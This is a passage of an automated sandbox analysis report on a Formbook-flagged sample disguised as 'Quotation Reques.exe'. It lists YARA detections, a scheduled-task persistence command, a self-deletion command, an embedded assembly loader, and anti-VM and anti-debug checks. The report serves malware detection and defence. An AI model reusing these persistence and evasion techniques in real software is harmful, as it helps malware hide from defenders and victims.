          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030703DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FEEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030822AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03071002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030820A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030828EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FBF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0308DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FD6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03081D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_030825DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FC841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FCD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0307D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FE2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FB0D20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: String function: 0117B150 appears 35 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02FBB150 appears 35 times
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.260917358.0000000008520000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261409049.0000000008900000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261409049.0000000008900000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.261136477.0000000008800000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.260463559.0000000008360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000000.00000002.257804637.0000000006B50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.295518659.00000000006D8000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.300144272.0000000002D5D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Quotation Reques.exe
          Source: Quotation Reques.exe, 00000006.00000002.299930455.00000000013FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation Reques.exe
          Source: Quotation Reques.exeBinary or memory string: OriginalFilenameRIPEMD160.exe6 vs Quotation Reques.exe
          Source: Quotation Reques.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Quotation Reques.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ftkqUsB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Quotation Reques.exe, LogIn.csBase64 encoded string:
          Source: ftkqUsB.exe.0.dr, LogIn.csBase64 encoded string:
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.csBase64 encoded string:
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.csBase64 encoded string:
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.csBase64 encoded string:
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.csBase64 encoded string:
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/4@14/7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Roaming\ftkqUsB.exe
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_01
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1923.tmp
          Source: Quotation Reques.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quotation Reques.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Quotation Reques.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Quotation Reques.exeVirustotal: Detection: 26%
          Source: Quotation Reques.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile read: C:\Users\user\Desktop\Quotation Reques.exe
          Source: unknownProcess created: C:\Users\user\Desktop\Quotation Reques.exe 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
          Source: C:\Users\user\Desktop\Quotation Reques.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Quotation Reques.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Quotation Reques.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: Quotation Reques.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ftkqUsB.exe.0.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041363A push 2B6D3EBBh; ret
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003976BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003976D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0300D0D1 push ecx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.41809908536
          Source: C:\Users\user\Desktop\Quotation Reques.exeFile created: C:\Users\user\AppData\Roaming\ftkqUsB.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara matchFile source: 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252016521.00000000025CB000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Quotation Reques.exe PID: 6476, type: MEMORY
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.25b68bc.1.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Quotation Reques.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Quotation Reques.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000027A85F4 second address: 00000000027A85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe | RDTSC instruction interceptor: First address: 00000000027A898E second address: 00000000027A8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Quotation Reques.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\Quotation Reques.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Quotation Reques.exe TID: 6480 | Thread sleep time: -103883s >= -30000s
Source: C:\Users\user\Desktop\Quotation Reques.exe TID: 6508 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1260 | Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 6804 | Thread sleep time: -42000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose,
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.276205603.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000007.00000002.499562752.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000000.255979179.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000007.00000000.276290467.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000007.00000002.492781138.00000000011EE000.00000004.00000020.sdmp | Binary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqq
Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000002.505306123.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000000.276290467.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.275750428.0000000008270000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Quotation Reques.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Quotation Reques.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_004088C0 rdtsc
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_00409B30 LdrLoadDll,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 16_2_003A2258 IsDebuggerPresent,
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01248D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01179100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0123E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_0117AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_011FA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Quotation Reques.exe | Code function: 6_2_01183D34 mov eax, dword ptr fs:[00000030h]
